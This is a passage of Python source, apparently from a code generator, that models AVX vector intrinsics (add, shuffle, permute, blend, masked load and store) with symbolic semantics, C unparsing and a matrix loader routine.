def computeSym(self, nameList):
return [ self.srcs[3].computeSym(nameList)[0], self.srcs[2].computeSym(nameList)[0], self.srcs[1].computeSym(nameList)[0], self.srcs[0].computeSym(nameList)[0] ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
s2ZMask = self.srcs[2].getZMask()
s3ZMask = self.srcs[3].getZMask()
return [ s3ZMask[0], s2ZMask[0], s1ZMask[0], s0ZMask[0] ]
def unparse(self, indent):
return indent + "_mm256_set_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + self.srcs[2].unparse("") + ", " + self.srcs[3].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256SetPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + self.srcs[2].printInst("") + ", " + self.srcs[3].printInst("") + " )"
class mm256CastPd128Pd256(RValue):
def __init__(self, src):
super(mm256CastPd128Pd256, self).__init__()
self.srcs += [ src ]
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
x = sympify('x') # Unknown
return [ src[0], src[1], x, x ]
def unparse(self, indent):
return indent + "_mm256_castpd128_pd256(" + self.srcs[0].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256CastPd128Pd256( " + self.srcs[0].printInst("") + " )"
class mm256CastPd256Pd128(RValue):
def __init__(self, src):
super(mm256CastPd256Pd128, self).__init__()
self.srcs += [ src ]
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
return [ src[0], src[1] ]
def unparse(self, indent):
return indent + "_mm256_castpd256_pd128(" + self.srcs[0].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256CastPd256Pd128( " + self.srcs[0].printInst("") + " )"
class mm256AddPd(RValue):
def __init__(self, src0, src1):
super(mm256AddPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0] + src1[0], src0[1] + src1[1], src0[2] + src1[2], src0[3] + src1[3] ]
def unparse(self, indent):
return indent + "_mm256_add_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256AddPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256SubPd(RValue):
def __init__(self, src0, src1):
super(mm256SubPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0] - src1[0], src0[1] - src1[1], src0[2] - src1[2], src0[3] - src1[3] ]
def unparse(self, indent):
return indent + "_mm256_sub_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256SubPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256MulPd(RValue):
def __init__(self, src0, src1):
super(mm256MulPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0] * src1[0], src0[1] * src1[1], src0[2] * src1[2], src0[3] * src1[3] ]
def unparse(self, indent):
return indent + "_mm256_mul_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256MulPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256DivPd(RValue):
def __init__(self, src0, src1):
super(mm256DivPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0] / src1[0], src0[1] / src1[1], src0[2] / src1[2], src0[3] / src1[3] ]
def unparse(self, indent):
return indent + "_mm256_div_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256DivPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256SqrtPd(RValue):
def __init__(self, src):
super(mm256SqrtPd, self).__init__()
self.srcs += [ src ]
def unparse(self, indent):
return indent + "_mm256_sqrt_pd(" + self.srcs[0].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256SqrtPd( " + self.srcs[0].printInst("") + " )"
class mm256HaddPd(RValue):
def __init__(self, src0, src1):
super(mm256HaddPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0]+src0[1], src1[0]+src1[1], src0[2]+src0[3], src1[2]+src1[3] ]
def unparse(self, indent):
return indent + "_mm256_hadd_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256HaddPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256SetzeroPd(RValue):
def __init__(self):
super(mm256SetzeroPd, self).__init__()
def computeSym(self, nameList):
return [ sympify(0), sympify(0), sympify(0), sympify(0) ]
def unparse(self, indent):
return indent + "_mm256_setzero_pd()"
def printInst(self, indent):
return indent + "mm256SetzeroPd()"
class mm256Permute2f128Pd(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256Permute2f128Pd, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def select4(self, src0, src1, control, ifzero):
imm = 0
if control[0]:
return [ifzero]*2
for bit in control[2:]:
imm = (imm << 1) | int(bit)
if imm == 0:
return [src0[i] for i in range(2)]
if imm == 1:
return [src0[i] for i in range(2,4)]
if imm == 2:
return [src1[i] for i in range(2)]
if imm == 3:
return [src1[i] for i in range(2,4)]
def computeSym(self, nameList): # To be fixed (more general)
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return self.select4(src0, src1, self.immBitList[4:], sympify(0)) + self.select4(src0, src1, self.immBitList[:4], sympify(0)) # low lane from imm[3:0], high lane from imm[7:4]; both lanes select among src0/src1
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return self.select4(s0ZMask, s1ZMask, self.immBitList[4:], 1) + self.select4(s0ZMask, s1ZMask, self.immBitList[:4], 1) # low lane from imm[3:0], high lane from imm[7:4]; both lanes select among src0/src1
def unparse(self, indent):
return indent + "_mm256_permute2f128_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256Permute2f128Pd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
class mm256PermutePd(RValue):
def __init__(self, src, immBitList):
super(mm256PermutePd, self).__init__()
self.srcs += [ src ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
return [ src[1] if self.immBitList[3] else src[0], src[1] if self.immBitList[2] else src[0], src[3] if self.immBitList[1] else src[2], src[3] if self.immBitList[0] else src[2] ]
def getZMask(self):
sZMask = self.srcs[0].getZMask()
return [ sZMask[1] if self.immBitList[3] else sZMask[0], sZMask[1] if self.immBitList[2] else sZMask[0], sZMask[3] if self.immBitList[1] else sZMask[2], sZMask[3] if self.immBitList[0] else sZMask[2] ]
def unparse(self, indent):
return indent + "_mm256_permute_pd(" + self.srcs[0].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256PermutePd( " + self.srcs[0].printInst("") + ", " + str(self.immBitList) + " )"
class mm256ShufflePd(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256ShufflePd, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[self.immBitList[3]], src1[self.immBitList[2]], src0[2 + self.immBitList[1]], src1[2 + self.immBitList[0]] ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s0ZMask[self.immBitList[3]], s1ZMask[self.immBitList[2]], s0ZMask[2 + self.immBitList[1]], s1ZMask[2 + self.immBitList[0]] ]
def unparse(self, indent):
return indent + "_mm256_shuffle_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256ShufflePd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
class mm256UnpackloPd(RValue):
def __init__(self, src0, src1):
super(mm256UnpackloPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0], src1[0], src0[2], src1[2] ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s0ZMask[0], s1ZMask[0], s0ZMask[2], s1ZMask[2] ]
def unparse(self, indent):
return indent + "_mm256_unpacklo_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256UnpackloPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256UnpackhiPd(RValue):
def __init__(self, src0, src1):
super(mm256UnpackhiPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[1], src1[1], src0[3], src1[3] ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s0ZMask[1], s1ZMask[1], s0ZMask[3], s1ZMask[3] ]
def unparse(self, indent):
return indent + "_mm256_unpackhi_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256UnpackhiPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256BlendPd(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256BlendPd, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def computeSym(self, nameList):
e = 3
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src1[i] if self.immBitList[e-i] else src0[i] for i in range(e+1) ] # all 4 elements; immBitList is MSB-first, imm bit i selects src1 for element i
def getZMask(self):
e = 3
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s1ZMask[i] if self.immBitList[e-i] else s0ZMask[i] for i in range(e+1) ] # all 4 elements; immBitList is MSB-first, imm bit i selects src1 for element i
def unparse(self, indent):
return indent + "_mm256_blend_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256BlendPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
class mm256LoaduPs(RValue, VecAccess):
def __init__(self, pointer, zeromask=None):
super(mm256LoaduPs, self).__init__()
self.reglen = 8
self.mrmap = range(self.reglen)
self.zeromask = [0]*self.reglen
if zeromask is not None:
for pos in zeromask:
self.zeromask[pos] = 1
self.pointer = pointer
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
return [ sympify(p+'_'+str(i)) for i in range(self.reglen) ]
def getZMask(self):
return self.zeromask
def unparse(self, indent):
return indent + "_mm256_loadu_ps(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "mm256LoaduPs( " + self.pointer.printInst("") + " )"
def __eq__(self, other):
return isinstance(other, mm256LoaduPs) and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256LoaduPs"), self.pointer.mat, self.pointer.at))
class mm256MaskloadPs(RValue, VecAccess):
def __init__(self, pointer, vecmask, zeromask=None):
super(mm256MaskloadPs, self).__init__()
self.reglen = 8
self.mrmap = []
self.zeromask = []
for m,i in zip(vecmask,range(8)):
self.mrmap += [i] if m else [-1]
self.zeromask += [0] if m else [1]
if zeromask is not None:
for pos in zeromask: # there should be at most one pos == 0 here
self.zeromask[pos] = 1
self.pointer = pointer
self.vecmask = vecmask
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
res = []
for m,i in zip(self.vecmask,range(self.reglen)):
res += [sympify(p+'_'+str(i))] if m else [sympify(0)]
return res
def getZMask(self):
return self.zeromask
def unparse(self, indent):
vm = "_mm256_setr_epi32("
for m,i in zip(self.vecmask,range(self.reglen)):
vm += "(int)1 << 31" if m else "0"
vm += ", " if i<7 else ")"
return indent + "_mm256_maskload_ps(" + self.pointer.unparse("") + ", " + vm + ")"
def printInst(self, indent):
return indent + "mm256MaskloadPs( " + self.pointer.printInst("") + ", " + str(self.vecmask) + ")"
def __eq__(self, other):
return isinstance(other, mm256MaskloadPs) and self.vecmask == other.vecmask and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256MaskloadPs"), hash(tuple(self.vecmask)), self.pointer.mat, self.pointer.at))
class mm256BroadcastSs(RValue, VecAccess):
def __init__(self, pointer, zeromask=None):
super(mm256BroadcastSs, self).__init__()
self.reglen = 8
self.mrmap = [tuple(range(self.reglen))]
self.zeromask = [0]*self.reglen
if zeromask is not None: # In this case all the positions have to be zero
self.zeromask = [1]*self.reglen
self.pointer = pointer
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
return [ sympify(p+'_0') ]*self.reglen
def getZMask(self):
return self.zeromask
def unparse(self, indent):
return indent + "_mm256_broadcast_ss(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "mm256BroadcastSs( " + self.pointer.printInst("") + " )"
def __eq__(self, other):
return isinstance(other, mm256BroadcastSs) and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256BroadcastSs"), self.pointer.mat, self.pointer.at))
class mm256StoreuPs(MovStatement):
mrmap = range(8) # static definition of the mem-reg mapping imposed by the store
def __init__(self, src, dst):
super(mm256StoreuPs, self).__init__()
self.dst = VecDest(dst, 8, self.mrmap) if isinstance(dst, Pointer) else VecDest(dst.pointer, 8, self.mrmap)
self.srcs += [ src ]
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
@staticmethod
def canStore(reglen, mrmap, horizontal=True, isAligned=False):
if not horizontal: return False
return reglen == 8 and mrmap == mm256StoreuPs.mrmap
@staticmethod
def getStore(src, dst):
return mm256StoreuPs(src, dst)
def computeSym(self, nameList):
return self.srcs[0].computeSym(nameList)
def unparse(self, indent):
return indent + "_mm256_storeu_ps(" + self.dst.unparse("") + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "mm256StoreuPs( " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
class mm256MaskstorePs(MovStatement):
def __init__(self, vecmask, src, dst):
super(mm256MaskstorePs, self).__init__()
self.mrmap = []
for m,i in zip(vecmask,range(8)):
self.mrmap += [i] if m else [-1]
self.dst = VecDest(dst, 8, self.mrmap) if isinstance(dst, Pointer) else VecDest(dst.pointer, 8, self.mrmap)
self.srcs += [ src ]
self.vecmask = vecmask
@staticmethod
def canStore(reglen, mrmap, horizontal=True, isAligned=False):
if not horizontal: return False
itcan = True
for m,i in zip(mrmap,range(8)):
itcan = itcan and (m == i or m == -1)
return reglen == 8 and itcan
@staticmethod
def getStore(src, dst):
vecmask = [ (0 if r == -1 else 1) for r in dst.mrmap ]
vecmask.extend([0 for _ in range(len(dst.mrmap), 8)])
return mm256MaskstorePs(vecmask, src, dst)
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
res = []
for m,i in zip(self.vecmask,range(8)): # all 8 single-precision lanes
res += [src[i]] if m else ["-"]
return res
def unparse(self, indent):
vm = "_mm256_setr_epi32("
for m,i in zip(self.vecmask,range(8)):
vm += "(int)1 << 31" if m else "0"
vm += ", " if i<7 else ")"
return indent + "_mm256_maskstore_ps(" + self.dst.unparse("") + ", " + vm + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "mm256MaskstorePs( " + str(self.vecmask) + ", " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
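# Illustration: for a destination with mrmap [0, 1, -1, 3], getStore builds
# vecmask [1, 1, 0, 1, 0, 0, 0, 0], so only lanes 0, 1 and 3 are written back
# to memory; the remaining lanes are left untouched.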
class mm256AddPs(RValue):
def __init__(self, src0, src1):
super(mm256AddPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[i] + src1[i] for i in range(8) ]
def unparse(self, indent):
return indent + "_mm256_add_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256AddPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256SubPs(RValue):
def __init__(self, src0, src1):
super(mm256SubPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[i] - src1[i] for i in range(8) ]
def unparse(self, indent):
return indent + "_mm256_sub_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256SubPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256MulPs(RValue):
def __init__(self, src0, src1):
super(mm256MulPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[i] * src1[i] for i in range(8) ]
def unparse(self, indent):
return indent + "_mm256_mul_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256MulPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256HaddPs(RValue):
def __init__(self, src0, src1):
super(mm256HaddPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
lane0 = [ src0[0]+src0[1], src0[2]+src0[3], src1[0]+src1[1], src1[2]+src1[3] ]
lane1 = [ src0[4]+src0[5], src0[6]+src0[7], src1[4]+src1[5], src1[6]+src1[7] ]
return lane0 + lane1
def unparse(self, indent):
return indent + "_mm256_hadd_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256HaddPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
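# Illustration of the per-lane hadd semantics modeled above, with
# a = [a0..a7] and b = [b0..b7]:
#   result = [a0+a1, a2+a3, b0+b1, b2+b3, a4+a5, a6+a7, b4+b5, b6+b7]
# i.e. adjacent pairs are summed independently within each 128-bit lane.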
class mm256Permute2f128Ps(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256Permute2f128Ps, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def select4(self, src0, src1, control, ifzero):
imm = 0
if control[0]:
return [ifzero]*4
for bit in control[2:]:
imm = (imm << 1) | int(bit)
if imm == 0:
return [src0[i] for i in range(4)]
if imm == 1:
return [src0[i] for i in range(4,8)]
if imm == 2:
return [src1[i] for i in range(4)]
if imm == 3:
return [src1[i] for i in range(4,8)]
def computeSym(self, nameList): # To be fixed (more general)
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return self.select4(src0, src1, self.immBitList[4:], sympify(0)) + self.select4(src0, src1, self.immBitList[:4], sympify(0)) # both nibbles select among {src0, src1}: low nibble -> low lane, high nibble -> high lane
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return self.select4(s0ZMask, s1ZMask, self.immBitList[4:], 1) + self.select4(s0ZMask, s1ZMask, self.immBitList[:4], 1) # both nibbles select among {src0, src1}
def unparse(self, indent):
return indent + "_mm256_permute2f128_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256Permute2f128Ps( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
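# Illustration of the imm8 handling above: select4 reads a 4-bit nibble
# [zero, -, s1, s0]; selector value 0/1 picks the first argument's low/high
# 128-bit lane, 2/3 the second argument's, and the zero bit blanks the lane.
# Per the Intel semantics of _mm256_permute2f128_ps, the low nibble of imm8
# (immBitList[4:], MSB-first) forms the result's low lane and the high nibble
# (immBitList[:4]) its high lane; e.g. imm = 0x21 concatenates the first
# operand's high lane with the second operand's low lane.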
class mm256UnpackloPs(RValue):
def __init__(self, src0, src1):
super(mm256UnpackloPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
lane0 = [ src0[0], src1[0], src0[1], src1[1] ]
lane1 = [ src0[4], src1[4], src0[5], src1[5] ]
return lane0 + lane1
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
lane0 = [ s0ZMask[0], s1ZMask[0], s0ZMask[1], s1ZMask[1] ]
lane1 = [ s0ZMask[4], s1ZMask[4], s0ZMask[5], s1ZMask[5] ]
return lane0 + lane1
def unparse(self, indent):
return indent + "_mm256_unpacklo_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256UnpackloPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256UnpackhiPs(RValue):
def __init__(self, src0, src1):
super(mm256UnpackhiPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
lane0 = [ src0[2], src1[2], src0[3], src1[3] ]
lane1 = [ src0[6], src1[6], src0[7], src1[7] ]
return lane0 + lane1
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
lane0 = [ s0ZMask[2], s1ZMask[2], s0ZMask[3], s1ZMask[3] ]
lane1 = [ s0ZMask[6], s1ZMask[6], s0ZMask[7], s1ZMask[7] ]
return lane0 + lane1
def unparse(self, indent):
return indent + "_mm256_unpackhi_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256UnpackhiPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256BlendPs(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256BlendPs, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def computeSym(self, nameList):
e = 7
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src1[i] if self.immBitList[e-i] else src0[i] for i in range(e+1) ] # all 8 lanes; immBitList is MSB-first
def getZMask(self):
e = 7
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s1ZMask[i] if self.immBitList[e-i] else s0ZMask[i] for i in range(e+1) ] # all 8 lanes
def unparse(self, indent):
return indent + "_mm256_blend_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256BlendPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
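# Illustration: immBitList is MSB-first, so immBitList[7-i] controls lane i.
# E.g. immBitList [0,0,0,0,0,1,0,1] (imm = 5) takes lanes 0 and 2 from src1
# and the remaining six lanes from src0, matching _mm256_blend_ps where a set
# imm8 bit i selects lane i of the second operand.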
class mm256ShufflePs(RValue):
def __init__(self, src0, src1, immTuple):
super(mm256ShufflePs, self).__init__()
self.srcs += [ src0, src1 ]
self.immTuple = tuple(immTuple)
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
lane0 = [ src0[self.immTuple[3]], src0[self.immTuple[2]], src1[self.immTuple[1]], src1[self.immTuple[0]] ]
lane1 = [ src0[4 + self.immTuple[3]], src0[4 + self.immTuple[2]], src1[4 + self.immTuple[1]], src1[4 + self.immTuple[0]] ]
return lane0 + lane1
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
lane0 = [ s0ZMask[self.immTuple[3]], s0ZMask[self.immTuple[2]], s1ZMask[self.immTuple[1]], s1ZMask[self.immTuple[0]] ]
lane1 = [ s0ZMask[4 + self.immTuple[3]], s0ZMask[4 + self.immTuple[2]], s1ZMask[4 + self.immTuple[1]], s1ZMask[4 + self.immTuple[0]] ]
return lane0 + lane1
def unparse(self, indent):
return indent + "_mm256_shuffle_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", _MM_SHUFFLE" + str(self.immTuple) + ")"
def printInst(self, indent):
return indent + "mm256ShufflePs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immTuple) + " )"
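# Illustration: with immTuple (z, y, x, w) — matching _MM_SHUFFLE(z, y, x, w) —
# each 128-bit lane of the result becomes [a[w], a[x], b[y], b[z]] (indices
# taken within the lane), which is what computeSym mirrors by reading
# immTuple[3] down to immTuple[0].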
class mm256SetzeroPs(RValue):
def __init__(self):
super(mm256SetzeroPs, self).__init__()
def computeSym(self, nameList):
return [ sympify(0) ]*8
def unparse(self, indent):
return indent + "_mm256_setzero_ps()"
def printInst(self, indent):
return indent + "mm256SetzeroPs()"
class _Dbl4Loader(Loader):
def __init__(self):
super(_Dbl4Loader, self).__init__()
def loadMatrix(self, mParams):
src, dst = mParams['m'], mParams['nuM']
sL, sR = mParams['mL'], mParams['mR']
dL, dR = mParams['nuML'], mParams['nuMR']
M, N = mParams['M'], mParams['N']
nuMM, nuMN = mParams['nuMM'], mParams['nuMN']
isCompact = mParams['compact']
mStruct, mAccess = mParams['struct'], mParams['access']
instructions = []
nu = 4
instructions.append(Comment('AVX Loader:'))
if Matrix.testGeneral(mStruct, mAccess, M, N):
# if (len(mStruct) == 1 and Matrix in mStruct) or (M!=N):
if M == 1 and N == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
# vmask = [1] + 7*[0]
pa = AddressOf(sa(src[sL.of(0),sR.of(0)]))
if mParams['bcast']:
va = mm256LoadGd(pa, [tuple(range(nu))])
else:
va = mm256LoadGd(pa, [0])
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
pc = Pointer(dst[dL.of(0),dR.of(0)])
horizontal = M==1
pa = Pointer(src[sL.of(0),sR.of(0)])
va = mm256LoadGd(pa, range(max(M,N)), isCompact=isCompact, horizontal=horizontal)
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif ((M < nu and N < nu) or (M == nu and N > 1 and N < nu) or (M > 1 and M < nu and N == nu)):
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
pas = [ Pointer(src[sL.of(i),sR.of(0)]) for i in range(M) ]
vas = [ mm256LoadGd(pas[i], range(N)) for i in range(M) ]
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ mm256StoreGd(vas[i], pcs[i], range(nu)) for i in range(M) ]
instructions += [ mm256StoreGd(mm256SetzeroPd(), pcs[i], range(nu)) for i in range(M,nu) ]
elif Symmetric.testLower(mStruct, mAccess, M, N):
# elif M == N and mAccess.intersect(Map("{[i,j]->[i,j]}")) != mAccess: #mAccess != Map("{[i,j]->[i,j]}"):
# if mAccess == Map("{[i,j]->[i,j]: j<=i}").union(Map("{[i,j]->[j,i]: j>i}")):
#LSymm
vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(i+1), isCompact) for i in range(0, M-1)]
vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(0)]), range(M), isCompact))
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
if M == 1:
rows = vs
elif M == 2:
rows = [ mm256ShufflePd(vs[0], vs[1], (0,0,0,0)) ]
rows.extend(vs[1:])
elif M == 3:
r2to1 = mm256ShufflePd(vs[0], vs[1], (0,0,0,0))
r3to1 = mm256Permute2f128Pd(r2to1, vs[2], (0,0,1,0,0,0,0,0))
